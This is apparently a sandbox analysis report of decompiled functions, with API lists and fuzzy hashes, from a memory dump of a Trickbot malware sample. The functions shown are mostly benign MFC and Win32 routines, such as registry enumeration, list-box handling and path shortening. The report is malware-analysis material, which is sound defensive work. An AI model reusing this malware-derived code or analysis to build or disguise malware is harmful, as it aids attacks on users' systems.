                          					RegQueryValueA(0x80000001,  *(_t84 - 0x18), _t84 - 0x12c, _t84 - 0x24);   // return value ignored
                          					 *(_t84 - 4) = 0;
                          					E00417EC8(_t84 - 0x18);                            // ~CString strSubKey
                          					 *(_t84 - 4) =  *(_t84 - 4) | 0xffffffff;
                          					E00417EC8(_t84 - 0x10);                            // ~CString strKey
                          				}
                          				_t37 = 1;
                          				 *[fs:0x0] =  *((intOrPtr*)(_t84 - 0xc));            // pop the SEH frame
                          				return _t37;                                        // always TRUE
                          			}

                          Instruction addresses for the listing above (flattened side column): 0x00431cf3, 0x00431d02, 0x00431d04, 0x00431d07, 0x00431d0e, 0x00431d11, 0x00431d13, 0x00431d19, 0x00431d20, 0x00431d2b, 0x00431d2b, 0x00431d2e, 0x00431d13, 0x00431d36, 0x00431d45, 0x00431d50, 0x00431d53, 0x00431d5b, 0x00431d60, 0x00431d64, 0x00431d65, 0x00431d6a, 0x00431d70, 0x00431d74, 0x00431d78, 0x00431d79, 0x00431d81, 0x00431d85, 0x00431d96, 0x00431dab, 0x00431dc8, 0x00431dd1, 0x00431dd1, 0x00431dd9, 0x00431dd9, 0x00431dee, 0x00431df7, 0x00431dfa, 0x00431dff, 0x00431e06, 0x00431e0b, 0x00431e11, 0x00431e14, 0x00431e1c

                          APIs
                          • __EH_prolog.LIBCMT ref: 00431CF3
                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00431DA3
                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 00431DBD
                          • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00431DD9
                          • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 00431DEE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CloseEnumH_prologOpenQueryValue
                          • String ID: Software\
                          • API String ID: 2161548231-964853688
                          • Opcode ID: 6044534ba4ab95e2b99d5af75a520d59b16bff63e35b83b08d7cbd69f13e16e4
                          • Instruction ID: e174d24991b7fd8e2b8e79c395860a4cab1dad34c49fab1acb2e43b429b1a046
                          • Opcode Fuzzy Hash: 6044534ba4ab95e2b99d5af75a520d59b16bff63e35b83b08d7cbd69f13e16e4
                          • Instruction Fuzzy Hash: C2316D7190021AABCF11EBA1CC85DEFBBBDFF09314F50056AF511A2191DB789E45CB68
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 68%
                          			// Fills a list-box control (dialog item 100) with one entry per object in a linked list at
                          			// this+0x5c, storing the object pointer as item data, then restores the selection. Decoded
                          			// SendMessage codes: 0x180 LB_ADDSTRING, 0x184 LB_RESETCONTENT, 0x186 LB_SETCURSEL,
                          			// 0x18b LB_GETCOUNT, 0x199 LB_GETITEMDATA, 0x19a LB_SETITEMDATA. Dialog plumbing only.
                          			E0042ABB7(intOrPtr __ecx) {
                          				void* __edi;
                          				long _t37;
                          				void* _t39;
                          				long _t40;
                          				intOrPtr* _t42;
                          				long _t43;
                          				long _t47;
                          				int _t48;
                          				intOrPtr _t53;
                          				intOrPtr* _t54;
                          				long _t61;
                          				void* _t67;
                          				void* _t72;
                          
                          				E00405340(E00438940, _t72);                          // __EH_prolog
                          				_t53 = __ecx;                                       // this
                          				 *((intOrPtr*)(_t72 - 0x14)) = __ecx;
                          				_t67 = E0041B5B5(__ecx, 0x64);                       // GetDlgItem(100) wrapper; the control's HWND is at +0x1c
                          				SendMessageA( *(_t67 + 0x1c), 0x184, 0, 0);          // LB_RESETCONTENT
                          				_t54 =  *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x5c)) + 4));   // head node of the list
                          				while(_t54 != 0) {
                          					_t42 = _t54;
                          					_t54 =  *_t54;                                  // next node
                          					_t61 =  *(_t42 + 8);                            // node payload: an object with a vtable
                          					_t43 =  *0x447478; // 0x44748c                   // shared empty-string data pointer used to initialise a CString
                          					 *(_t72 - 0x18) = _t61;
                          					 *(_t72 - 0x10) = _t43;                         // CString str (empty)
                          					 *(_t72 - 4) =  *(_t72 - 4) & 0x00000000;
                          					_push(2);
                          					_push(_t72 - 0x10);
                          					if( *((intOrPtr*)( *_t61 + 0x64))() == 0) {        // obj->slot(+0x64)(&str, 2): ask the object for its display text
                          						L6:
                          						 *(_t72 - 4) =  *(_t72 - 4) | 0xffffffff;
                          						E00417EC8(_t72 - 0x10);                     // ~CString str
                          						continue;
                          					} else {
                          						_t47 =  *(_t72 - 0x10);
                          						if( *((intOrPtr*)(_t47 - 8)) == 0) {          // CString length field (header sits 8 bytes before the buffer): skip empty text
                          							goto L6;
                          						} else {
                          							_t48 = SendMessageA( *(_t67 + 0x1c), 0x180, 0, _t47);   // LB_ADDSTRING, returns the new index
                          							if(_t48 == 0xffffffff) {                               // LB_ERR
                          								E004179AE( *((intOrPtr*)(_t72 - 0x14)), 0xffffffff);
                          								 *(_t72 - 4) =  *(_t72 - 4) | 0xffffffff;
                          								E00417EC8(_t72 - 0x10);
                          								_t39 = 0;                                          // return FALSE
                          							} else {
                          								SendMessageA( *(_t67 + 0x1c), 0x19a, _t48,  *(_t72 - 0x18));   // LB_SETITEMDATA(index, object pointer)
                          								goto L6;
                          							}
                          						}
                          					}
                          					L15:
                          					 *[fs:0x0] =  *((intOrPtr*)(_t72 - 0xc));        // pop the SEH frame
                          					return _t39;
                          				}
                          				_t37 = SendMessageA( *(_t67 + 0x1c), 0x18b, 0, 0);   // LB_GETCOUNT
                          				if(_t37 != 0) {
                          					_push(0);
                          					_push(0);
                          					if(_t37 != 1) {
                          						SendMessageA( *(_t67 + 0x1c), 0x186, ??, ??);   // LB_SETCURSEL(0) with the two pushed zeros
                          					} else {
                          						_t40 = SendMessageA( *(_t67 + 0x1c), 0x199, ??, ??);   // LB_GETITEMDATA(0): the only entry
                          						_t60 =  *((intOrPtr*)(_t72 - 0x14));
                          						_push(1);
                          						 *( *((intOrPtr*)(_t72 - 0x14)) + 0x60) = _t40;   // remember the selected object at this+0x60
                          						goto L10;
                          					}
                          				} else {
                          					_t60 =  *((intOrPtr*)(_t72 - 0x14));
                          					_push(0xffffffff);
                          					L10:
                          					E004179AE(_t60);                                // called with 1 (single entry) or -1 (empty list / LB_ERR)
                          				}
                          				_t39 = E00417AD6( *((intOrPtr*)(_t72 - 0x14)), _t67);
                          				goto L15;
                          			}

                          Instruction addresses for the listing above (flattened side column): 0x0042abbc, 0x0042abc7, 0x0042abcb, 0x0042abdb, 0x0042abe7, 0x0042abec, 0x0042abef, 0x0042abf3, 0x0042abf5, 0x0042abf7, 0x0042abfa, 0x0042abff, 0x0042ac02, 0x0042ac07, 0x0042ac0e, 0x0042ac10, 0x0042ac16, 0x0042ac41, 0x0042ac41, 0x0042ac48, 0x00000000, 0x0042ac18, 0x0042ac18, 0x0042ac1f, 0x00000000, 0x0042ac21, 0x0042ac2c, 0x0042ac31, 0x0042ac54, 0x0042ac59, 0x0042ac60, 0x0042ac65, 0x0042ac33, 0x0042ac3f, 0x00000000, 0x0042ac3f, 0x0042ac31, 0x0042ac1f, 0x0042acb6, 0x0042acbc, 0x0042acc4, 0x0042acc4, 0x0042ac75, 0x0042ac7b, 0x0042ac8c, 0x0042ac8d, 0x0042ac8e, 0x0042acac, 0x0042ac90, 0x0042ac98, 0x0042ac9a, 0x0042ac9d, 0x0042ac9f, 0x00000000, 0x0042ac9f, 0x0042ac7d, 0x0042ac7d, 0x0042ac80, 0x0042ac82, 0x0042ac82, 0x0042ac82, 0x0042acb1, 0x00000000

                          APIs
                          • __EH_prolog.LIBCMT ref: 0042ABBC
                            • Part of subcall function 0041B5B5: GetDlgItem.USER32(?,?), ref: 0041B5C3
                          • SendMessageA.USER32(?,00000184,00000000,00000000), ref: 0042ABE7
                          • SendMessageA.USER32(?,00000180,00000000,?), ref: 0042AC2C
                          • SendMessageA.USER32(?,0000019A,00000000,?), ref: 0042AC3F
                          • SendMessageA.USER32(?,0000018B,00000000,00000000), ref: 0042AC75
                          • SendMessageA.USER32(?,00000199,00000000,00000000), ref: 0042AC98
                          • SendMessageA.USER32(?,00000186,00000000,00000000), ref: 0042ACAC
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: MessageSend$H_prologItem
                          • String ID:
                          • API String ID: 621129232-0
                          • Opcode ID: 1c26ab7e009c79109e5abae75aa7852242aaffb60e1ec7b4103b96e8150eddcb
                          • Instruction ID: 63e4eefbe4e0b1c0a72d2788870ec25656163b125c34a88585b8646ff06262ec
                          • Opcode Fuzzy Hash: 1c26ab7e009c79109e5abae75aa7852242aaffb60e1ec7b4103b96e8150eddcb
                          • Instruction Fuzzy Hash: 0B31A130700215AFDB04DF55DD86FAEBB71BF04720F20422AE511AA2E1CB74AD51CB59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			// Consistent with MFC's CPreviewDC::MirrorMappingMode(bCompute): with _a4 set, read the attribute
                          			// DC's window/viewport extents (this+0x30 / this+0x38), double both while they stay within +/-0x4000
                          			// (0xffffc000 is -0x4000 as a signed value) to keep precision, rescale x and y through a MulDiv-style
                          			// helper using LOGPIXELSX/LOGPIXELSY (GetDeviceCaps 0x58 / 0x5a), then apply the result to the output
                          			// DC at this+4 in MM_ANISOTROPIC mode (SetMapMode 8). Print-preview GDI plumbing, nothing sample-specific.
                          			E00436DCB(void* __ebx, int __ecx, void* __edi, intOrPtr _a4) {
                          				struct HDC__* _t26;
                          				struct tagSIZE* _t39;
                          				int _t43;
                          				long _t45;
                          				struct tagSIZE* _t48;
                          				int _t51;
                          
                          				_t41 = __ecx;
                          				_t51 = __ecx;                                       // this
                          				if(_a4 != 0) {                                      // bCompute
                          					_t39 = __ecx + 0x38;                            // viewport extent (SIZE)
                          					GetViewportExtEx( *(__ecx + 8), _t39);           // this+8: attribute HDC
                          					_t48 = __ecx + 0x30;                            // window extent (SIZE)
                          					GetWindowExtEx( *(__ecx + 8), _t48);
                          					if(_t48->cx > 0xffffc000) {                     // cx > -0x4000
                          						while(1) {
                          							_t41 = _t48->cx;
                          							if(_t41 >= 0x4000) {
                          								goto L6;
                          							}
                          							_t45 = _t39->cx;
                          							if(_t45 > 0xffffc000 && _t45 < 0x4000) {
                          								_t41 = _t41 + _t41;                     // double both extents; the ratio is unchanged
                          								_t48->cx = _t41;
                          								_t39->cx = _t45 + _t45;
                          								if(_t41 > 0xffffc000) {
                          									continue;
                          								}
                          							}
                          							goto L6;
                          						}
                          					}
                          					L6:
                          					if( *(_t51 + 0x34) > 0xffffc000) {              // same loop for the .cy pair (this+0x34 / this+0x3c)
                          						while(1) {
                          							_t41 =  *(_t51 + 0x34);
                          							if(_t41 >= 0x4000) {
                          								goto L11;
                          							}
                          							_t43 =  *(_t51 + 0x3c);
                          							if(_t43 > 0xffffc000 && _t43 < 0x4000) {
                          								_t41 = _t41 + _t41;
                          								 *(_t51 + 0x34) = _t41;
                          								 *(_t51 + 0x3c) = _t43 + _t43;
                          								if(_t41 > 0xffffc000) {
                          									continue;
                          								}
                          							}
                          							goto L11;
                          						}
                          					}
                          					L11:
                          					_t39->cx = E00435FE8(_t41, _t39->cx,  *((intOrPtr*)(_t51 + 0x10)),  *0x44b310,  *((intOrPtr*)(_t51 + 0x14)), GetDeviceCaps( *(_t51 + 8), 0x58));   // 0x58 = LOGPIXELSX
                          					 *(_t51 + 0x3c) = E00435FE8(_t41,  *(_t51 + 0x3c),  *((intOrPtr*)(_t51 + 0x10)),  *0x44b314,  *((intOrPtr*)(_t51 + 0x14)), GetDeviceCaps( *(_t51 + 8), 0x5a));   // 0x5a = LOGPIXELSY
                          				}
                          				_t26 =  *(_t51 + 4);                                // output HDC
                          				if(_t26 != 0) {
                          					SetMapMode(_t26, 8);                            // MM_ANISOTROPIC
                          					SetWindowExtEx( *(_t51 + 4),  *(_t51 + 0x30),  *(_t51 + 0x34), 0);
                          					SetViewportExtEx( *(_t51 + 4),  *(_t51 + 0x38),  *(_t51 + 0x3c), 0);
                          					return E00436ED0(_t51);                         // in MirrorMappingMode this is the matching viewport-origin mirror
                          				}
                          				return _t26;
                          			}

                          Instruction addresses for the listing above (flattened side column): 0x00436dcb, 0x00436dd1, 0x00436dd3, 0x00436dda, 0x00436de2, 0x00436de8, 0x00436def, 0x00436dfc, 0x00436dfe, 0x00436dfe, 0x00436e06, 0x00000000, 0x00000000, 0x00436e08, 0x00436e0c, 0x00436e16, 0x00436e1c, 0x00436e1e, 0x00436e20, 0x00000000, 0x00000000, 0x00436e20, 0x00000000, 0x00436e0c, 0x00436dfe, 0x00436e22, 0x00436e25, 0x00436e27, 0x00436e27, 0x00436e30, 0x00000000, 0x00000000, 0x00436e32, 0x00436e37, 0x00436e41, 0x00436e47, 0x00436e4a, 0x00436e4d, 0x00000000, 0x00000000, 0x00436e4d, 0x00000000, 0x00436e37, 0x00436e27, 0x00436e4f, 0x00436e72, 0x00436e8f, 0x00436e92, 0x00436e93, 0x00436e98, 0x00436e9d, 0x00436eae, 0x00436ebf, 0x00000000, 0x00436ec7, 0x00436ecd

                          APIs
                          • GetViewportExtEx.GDI32(?,?), ref: 00436DE2
                          • GetWindowExtEx.GDI32(?,?), ref: 00436DEF
                          • GetDeviceCaps.GDI32(?,00000058), ref: 00436E5A
                          • GetDeviceCaps.GDI32(?,0000005A), ref: 00436E77
                          • SetMapMode.GDI32(00000000,00000008), ref: 00436E9D
                          • SetWindowExtEx.GDI32(00000000,?,?,00000000), ref: 00436EAE
                          • SetViewportExtEx.GDI32(00000000,?,?,00000000), ref: 00436EBF
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CapsDeviceViewportWindow$Mode
                          • String ID:
                          • API String ID: 396987064-0
                          • Opcode ID: 59358a1ebc2c0bb9ec79cbc61d1b169e630b456f2c9d16090ef3e2fad886905a
                          • Instruction ID: 6eddb97f4d8870a1f1b9193a11ebf6e97c11fe7c72b9581baa89cc462e3fb83c
                          • Opcode Fuzzy Hash: 59358a1ebc2c0bb9ec79cbc61d1b169e630b456f2c9d16090ef3e2fad886905a
                          • Instruction Fuzzy Hash: E0316D35100A02AFDB355F25DE41A27BBF6FF88701F11A42EE24281A60C775A855DF08
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 83%
                          			// Consistent with MFC's AfxAbbreviateName(lpszCanon, cchMax, bAtLeastName): shorten a path in place
                          			// to at most _a8 characters by replacing leading directories with "\...". E00433CD5 behaves like
                          			// AfxGetFileName (length of the file-name part plus one), E00405BB8 like _tcsinc (advance one
                          			// character). 0x5c is '\\'. Display helper, nothing sample-specific.
                          			E0041E1B5(void* __eflags, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                          				intOrPtr _v8;
                          				CHAR* _t22;
                          				int _t32;
                          				CHAR* _t34;
                          				intOrPtr _t36;
                          				CHAR* _t41;
                          				void* _t45;
                          				void* _t48;
                          
                          				_t41 = _a4;                                         // lpszCanon
                          				_t32 = lstrlenA(_t41);                              // cchFullPath
                          				_t22 = E00433CD5(_t41, 0, 0) - 1;                   // cchFileName
                          				_t45 = _t32 - _t22;                                 // length of the directory part
                          				_a4 = _t22;
                          				_t36 = _t45 + _t41;                                 // pointer to the file-name part
                          				_v8 = _t36;
                          				if(_a8 < _t32) {                                    // nothing to do when the path already fits
                          					if(_a8 >= _t22) {                               // does at least the file name fit?
                          						_t34 =  &(_t41[2]);
                          						if( *_t41 == 0x5c && _t41[1] == 0x5c) {      // UNC path "\\server\share": step past the server name
                          							while( *_t34 != 0x5c) {
                          								_t34 = E00405BB8(_t34);
                          							}
                          						}
                          						if(_t45 > 3) {                              // skip the first component (past "C:" or the share name)
                          							do {
                          								_t34 = E00405BB8(_t34);
                          							} while ( *_t34 != 0x5c);
                          						}
                          						_t48 = _t34 - _t41;                         // length of the volume prefix
                          						if(_a8 >= _t48 +  &(_a4[5])) {               // room for volume + "\..." + file name?
                          							while(lstrlenA(_t34) + _t48 + 4 > _a8) {    // drop leading directories until the rest fits
                          								do {
                          									_t34 = E00405BB8(_t34);
                          								} while ( *_t34 != 0x5c);
                          							}
                          							 *(_t48 + _t41) =  *(_t48 + _t41) & 0x00000000;   // terminate after the volume prefix
                          							lstrcatA(_t41, "\...");                             // literal bytes '\' '.' '.' '.'
                          							_t22 = lstrcatA(_t41, _t34);                        // append the surviving "\dir\file" tail
                          						} else {
                          							_push(_v8);                             // only the file name fits: move it to the front
                          							goto L13;
                          						}
                          					} else {
                          						if(_a12 == 0) {                                 // bAtLeastName == FALSE: not even the file name fits
                          							_t36 = 0x449788;                            // string constant in .data, not shown in this listing (the empty string in AfxAbbreviateName)
                          						}
                          						_push(_t36);
                          						L13:
                          						_t22 = lstrcpyA(_t41, ??);                      // in-place copy; the source argument is the value pushed above
                          					}
                          				}
                          				return _t22;
                          			}

                          Instruction addresses for the listing above (flattened side column): 0x0041e1bc, 0x0041e1cb, 0x0041e1d2, 0x0041e1d5, 0x0041e1da, 0x0041e1dd, 0x0041e1e0, 0x0041e1e3, 0x0041e1ec, 0x0041e1ff, 0x0041e202, 0x0041e20a, 0x0041e216, 0x0041e216, 0x0041e20a, 0x0041e21d, 0x0041e21f, 0x0041e225, 0x0041e228, 0x0041e21f, 0x0041e232, 0x0041e23b, 0x0041e249, 0x0041e259, 0x0041e25f, 0x0041e262, 0x0041e267, 0x0041e269, 0x0041e279, 0x0041e27d, 0x0041e23d, 0x0041e23d, 0x00000000, 0x0041e23d, 0x0041e1ee, 0x0041e1f2, 0x0041e1f4, 0x0041e1f4, 0x0041e1f9, 0x0041e240, 0x0041e241, 0x0041e241, 0x0041e1ec, 0x0041e283

                          APIs
                          • lstrlenA.KERNEL32(?), ref: 0041E1C0
                            • Part of subcall function 00433CD5: lstrlenA.KERNEL32(00000104,00000000,?,00433C19), ref: 00433D0C
                          • lstrcpyA.KERNEL32(?,?,?,00000000,00000000), ref: 0041E241
                          • lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 0041E24A
                          • lstrcatA.KERNEL32(?,\...), ref: 0041E279
                          • lstrcatA.KERNEL32(?,?), ref: 0041E27D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: lstrlen$lstrcat$lstrcpy
                          • String ID: \...
                          • API String ID: 2778582283-1167917071
                          • Opcode ID: 2e4b2251d7e88ea50e4383ec5ae115814b18c2cc3648c5935855a9390340784e
                          • Instruction ID: c5b0d186b5e6e00bf646628a34ffe7ef319debc6b4a4fc3aaf02cd7c5ee6fe8b
                          • Opcode Fuzzy Hash: 2e4b2251d7e88ea50e4383ec5ae115814b18c2cc3648c5935855a9390340784e
                          • Instruction Fuzzy Hash: 8C210A75904715EEEB209B62CC80FEB7BECAB19355F1441AFFD0192181D3BCAD808B99
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • PeekMessageA.USER32(?,00000000,0000000F,0000000F,00000000), ref: 0042A60B
                          • GetMessageA.USER32(0000000F,00000000,0000000F,0000000F), ref: 0042A619
                          • DispatchMessageA.USER32(?), ref: 0042A62C
                          • SetRectEmpty.USER32(?), ref: 0042A655
                          • GetDesktopWindow.USER32 ref: 0042A66D
                          • LockWindowUpdate.USER32(?), ref: 0042A67E
                          • GetDCEx.USER32(?,00000000,00000003), ref: 0042A695
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
                          • String ID:
                          • API String ID: 1192691108-0
                          • Opcode ID: 33879e7665ae184719dfb36f7fee613eec93c6130e3ad06d96c7ef6a59c10d0f
                          • Instruction ID: 7f7fbaa4fa5e0c4174574a3d56e538dd8143d8bd7430bf6d1951b2961d2ba38a
                          • Opcode Fuzzy Hash: 33879e7665ae184719dfb36f7fee613eec93c6130e3ad06d96c7ef6a59c10d0f
                          • Instruction Fuzzy Hash: 28214FB2500709AFD7109FA6EC84E67BBECFB08344B44092EF686C3651D775E8158B69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004122E0(struct HWND__* _a4, signed int _a8) {
                          				struct tagRECT _v16;
                          				signed int _t30;
                          				intOrPtr _t39;
                          				signed char _t43;
                          				struct HWND__* _t49;
                          				struct HWND__* _t50;
                          				signed int _t51;
                          
                          				_t49 = _a4;
                          				GetWindowRect(_t49,  &_v16);
                          				_t30 = GetWindowLongA(_t49, 0xfffffff0);
                          				_t51 = _t30;
                          				if((_t30 & 0x10000000) == 0) {
                          					L12:
                          					return _t30;
                          				}
                          				_t30 = _a8;
                          				if(_t30 == 0) {
                          					L9:
                          					InflateRect( &_v16, 1, 1);
                          					_t50 = GetParent(_t49);
                          					ScreenToClient(_t50,  &_v16);
                          					ScreenToClient(_t50,  &(_v16.right));
                          					if((_t51 & 0x00200000) != 0) {
                          						_v16.right.x = _v16.right.x + 1;
                          					}
                          					return InvalidateRect(_t50,  &_v16, 0);
                          				}
                          				_t43 =  *(_t30 + 0x18);
                          				if((_t43 & 0x000000c0) != 0 || (_t43 & 0x00000002) == 0 || (_t43 & 0x00000001) == 0) {
                          					if((_t43 & 0x00000003) == 2 && _v16.right.x -  *((intOrPtr*)(_t30 + 0x10)) == _v16.left) {
                          						_t39 =  *((intOrPtr*)(_t30 + 0x14));
                          						if(_v16.bottom - _v16.top >= _t39) {
                          							_v16.top = _v16.top + _t39 + 1;
                          						}
                          					}
                          					goto L9;
                          				} else {
                          					goto L12;
                          				}
                          			}

                          APIs
                          • GetWindowRect.USER32(?), ref: 004122F0
                          • GetWindowLongA.USER32(?,000000F0), ref: 004122F9
                          • InflateRect.USER32(?,00000001,00000001), ref: 00412358
                          • GetParent.USER32(?), ref: 0041235F
                          • ScreenToClient.USER32(00000000,?), ref: 00412373
                          • ScreenToClient.USER32(00000000,?), ref: 0041237B
                          • InvalidateRect.USER32(00000000,?,00000000), ref: 00412391
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Rect$ClientScreenWindow$InflateInvalidateLongParent
                          • String ID:
                          • API String ID: 1809568455-0
                          • Opcode ID: 4bf9e6cfa3013578ec501a8ca1b2056eff676eba730fc66a29c25e174bd67c58
                          • Instruction ID: a302ff98f942a49cac17a4907d8431e305890a9432ffe03326d09e1dcc17417d
                          • Opcode Fuzzy Hash: 4bf9e6cfa3013578ec501a8ca1b2056eff676eba730fc66a29c25e174bd67c58
                          • Instruction Fuzzy Hash: 19215B3110420AAFD715DB64C999FBF73A9EB84720F04055EF961C2291D7B8DC85CB26
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 83%
                          			E0041A3D0(struct HDWP__** _a4, struct HWND__* _a8, RECT* _a12) {
                          				struct tagRECT _v20;
                          				int _t15;
                          				int _t23;
                          				struct HDWP__* _t25;
                          				struct HWND__* _t26;
                          				int _t27;
                          				long _t28;
                          				struct HDWP__** _t35;
                          				RECT* _t37;
                          
                          				_t26 = _a8;
                          				_t15 = GetParent(_t26);
                          				_t35 = _a4;
                          				_a8 = _t15;
                          				if(_t35 == 0 ||  *_t35 != 0) {
                          					GetWindowRect(_t26,  &_v20);
                          					ScreenToClient(_a8,  &_v20);
                          					ScreenToClient(_a8,  &(_v20.right));
                          					_t37 = _a12;
                          					_t15 = EqualRect( &_v20, _t37);
                          					if(_t15 == 0) {
                          						_t23 = _t37->top;
                          						_t27 = _t37->left;
                          						_t28 = _t37->bottom;
                          						_push(0x14);
                          						if(_t35 == 0) {
                          							return SetWindowPos(_t26, 0, _t27, _t23, _t37->right - _t27, _t28 - _t23, ??);
                          						}
                          						_t25 = DeferWindowPos( *_t35, _t26, 0, _t27, _t23, _t37->right - _t27, _t28 - _t23, ??);
                          						 *_t35 = _t25;
                          						return _t25;
                          					}
                          				}
                          				return _t15;
                          			}

                          APIs
                          • GetParent.USER32(?), ref: 0041A3DD
                          • GetWindowRect.USER32(?,?), ref: 0041A3F7
                          • ScreenToClient.USER32(?,?), ref: 0041A40A
                          • ScreenToClient.USER32(?,?), ref: 0041A413
                          • EqualRect.USER32(?,?), ref: 0041A41D
                          • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 0041A445
                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0041A45D
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Window$ClientRectScreen$DeferEqualParent
                          • String ID:
                          • API String ID: 443303494-0
                          • Opcode ID: e32be0cc4275794a2e0be4cf0687a7c16bd4c5a4422cdc4f6f62d4adffeb7bbf
                          • Instruction ID: 5d2d534cf4012ec7ceedb171feb202282690da689da753be87fadc4c52250ea9
                          • Opcode Fuzzy Hash: e32be0cc4275794a2e0be4cf0687a7c16bd4c5a4422cdc4f6f62d4adffeb7bbf
                          • Instruction Fuzzy Hash: F8114F7650020ABFEB118F68DC48EBB7BBDEF84720F148529B91593214E7B4BD54CB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 63%
                          			E0042ECD3(void* __ecx, signed int _a4, long _a8) {
                          				struct HWND__* _v8;
                          				long _t24;
                          				void* _t29;
                          				int _t32;
                          				struct HWND__* _t36;
                          
                          				_push(__ecx);
                          				_t29 = __ecx;
                          				if(GetKeyState(0x11) < 0) {
                          					_push(8);
                          					_pop(0);
                          				}
                          				if(GetKeyState(0x10) < 0) {
                          					_push(4);
                          					_pop(0);
                          				}
                          				_t36 = GetFocus();
                          				_v8 = GetDesktopWindow();
                          				if(_t36 != 0) {
                          					_t32 = _a4 << 0x10;
                          					do {
                          						_t24 = SendMessageA(_t36, 0x20a, _t32, _a8);
                          						_t36 = GetParent(_t36);
                          					} while (_t24 == 0 && _t36 != 0 && _t36 != _v8);
                          				} else {
                          					_t24 = SendMessageA( *(_t29 + 0x1c), 0x20a, _a4 << 0x10, _a8);
                          				}
                          				return _t24;
                          			}

                          APIs
                          • GetKeyState.USER32(00000011), ref: 0042ECE4
                          • GetKeyState.USER32(00000010), ref: 0042ECF4
